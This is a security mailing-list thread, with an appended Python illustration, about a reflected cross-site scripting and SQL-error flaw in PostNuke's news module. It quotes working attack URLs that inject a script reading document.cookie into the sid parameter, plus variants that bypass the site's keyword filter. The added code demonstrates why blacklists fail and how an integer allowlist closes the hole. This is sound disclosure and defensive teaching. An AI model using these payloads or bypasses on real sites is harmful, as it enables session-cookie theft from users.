I just checked it again:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>

where + denotes a blank space, or similarly this one:

http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script>

resulting in the "Sorry - $HTTP_GET_VARS contains javascript..." message.

However, the request:

?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>

or any character inserted before the first "script" and after the first less-than "<" results in a DB Error, revealing nothing (user/pass/path etc).

But I used IE and Netscape; maybe it's different with other browsers. :)

Regards

--------
Muhammad Faisal Rauf Danka
Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202

--- Daniel Woods <dwoods@ucalgary.ca> wrote:
>
> Humm!
>
>> on 26th Sep the following url:
>> http://news.postnuke.com/modules.php
>> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>>
>> used to give Alert PopUp and
>> Error:
>> DB Error: getArticles: 1064: You have an error in your SQL syntax near '='
>> at line 23
>>
>> now it gives:
>> Sorry - $HTTP_GET_VARS contains javascript...
>>
>> Prompt fix by PostNuke team, great work. Keep it up! :)
>
> Not so fast on the praise :(
>
> It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php
> ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
> Using the request...
> ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
> gives me the DB Error: message
>
> And using the request...
> ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
> gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
>
> Thanks... Dan.
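The filter bypass discussed in this thread, as an added example that is not part of the original messages and not PostNuke's code. It assumes (hypothetically) that the check behind the "contains javascript" message is a literal substring match on the token `<script>` in the decoded GET values; the query strings are constructed from the URLs quoted above. The example shows why the `<script+>` / `<script%20>` and `<\script>` variants slip past such a check, why a more tolerant tag regex still misses the backslash variant, and how validating `sid` as an integer (an allowlist) rejects every variant before it can reach either the HTML or the SQL query that produced the "DB Error" output.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed query strings modelled on the requests quoted in the thread.
# The '+' and '%20' forms decode to a space inside the tag, as the thread notes.
QUERIES = {
    "plain":     "op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>",
    "plus":      "op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>",
    "pct20":     "op=modload&name=News&file=article&sid=<script%20>alert(document.cookie);</script>",
    "backslash": "op=modload&name=News&file=article&sid=<\\script>alert(document.cookie);</script>",
    "benign":    "op=modload&name=News&file=article&sid=42",
}


def parse_query(query: str) -> dict:
    """Decode a query string the way a CGI layer does: split on '&', then
    percent-decode each key and value, turning '+' into a space."""
    params: dict = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def naive_filter_blocks(query: str) -> bool:
    """Hypothetical blacklist check: refuse the request if any decoded GET value
    contains the exact token '<script>'. This is an assumption about the kind of
    check behind the 'contains javascript' message, not PostNuke's real code.
    Note that '</script>' does not contain '<script>', so the closing tag in the
    payloads never triggers it."""
    return any("<script>" in v for values in parse_query(query).values() for v in values)


def tag_aware_filter_blocks(query: str) -> bool:
    """Slightly better blacklist: tolerate whitespace and case inside the tag,
    which catches the '<script >' variants. Still a blacklist, so '<\\script>'
    (any stray character between '<' and 'script') walks straight through it."""
    pattern = re.compile(r"<\s*script\b", re.IGNORECASE)
    return any(pattern.search(v) for values in parse_query(query).values() for v in values)


def validate_sid(query: str) -> Optional[int]:
    """Allowlist approach: 'sid' is an article id, so accept exactly one value
    that is a decimal integer and return it typed. Every payload above, whatever
    its tag syntax, is rejected before it can be echoed into the page or
    interpolated into the SQL query that produced the 'DB Error' output."""
    values = parse_query(query).get("sid", [])
    if len(values) != 1 or not re.fullmatch(r"[0-9]+", values[0]):
        return None
    return int(values[0])


if __name__ == "__main__":
    for name, query in QUERIES.items():
        print(f"{name:10s} naive={naive_filter_blocks(query)!s:5s} "
              f"tag_aware={tag_aware_filter_blocks(query)!s:5s} sid={validate_sid(query)}")
```

Run stand-alone, the table shows the naive check stopping only the plain `<script>` request, the tag-aware regex additionally stopping the two whitespace variants but not `<\script>`, and the integer allowlist accepting only `sid=42`. The practical lesson matches the thread: a blacklist on a free-form string is patched one bypass at a time, whereas typing the parameter closes both the script-injection and the SQL-error path at once.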